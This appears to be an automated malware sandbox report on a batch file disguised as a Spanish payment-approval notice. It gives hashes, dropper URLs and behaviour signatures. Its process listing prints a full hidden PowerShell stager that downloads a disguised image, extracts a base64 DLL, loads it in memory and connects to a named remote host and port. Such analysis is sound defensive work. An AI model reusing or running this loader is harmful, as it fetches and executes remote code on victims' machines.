Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    29/10/2024, 22:46

General

  • Target

    TRANSACCIÓN Pagar proveedores ha sido Aprobada.bat

  • Size

    210KB

  • MD5

    578af000aed63fa1ede68df809e4ecf1

  • SHA1

    8d4879bda890604c497961d1a7fa629d857392eb

  • SHA256

    063e9da93b4d0e7b9f9e78911962cb83fcb02d648fb8be4e4cfa24f4a828367d

  • SHA512

    0a88222d321d8f2367d12bfaa85e0816960277953437da758d480efb2cfdc4cb444e897ec8060a5b684af749b95f2a615f87c5ede99bb6847b96f5be45b48829

  • SSDEEP

    6144:vZXTzJ4W13nUOtjrquYrggU6qgAKggmcWg2w08:2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true

exe.dropper

https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TRANSACCIÓN Pagar proveedores ha sido Aprobada.bat"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2340

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2340-6-0x000007FEF57BE000-0x000007FEF57BF000-memory.dmp

          Filesize

          4KB

        • memory/2340-7-0x000000001B790000-0x000000001BA72000-memory.dmp

          Filesize

          2.9MB

        • memory/2340-9-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

          Filesize

          9.6MB

        • memory/2340-8-0x0000000001F40000-0x0000000001F48000-memory.dmp

          Filesize

          32KB

        • memory/2340-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

          Filesize

          9.6MB

        • memory/2340-11-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

          Filesize

          9.6MB

        • memory/2340-12-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

          Filesize

          9.6MB

        • memory/2340-13-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

          Filesize

          9.6MB

        • memory/2340-14-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

          Filesize

          9.6MB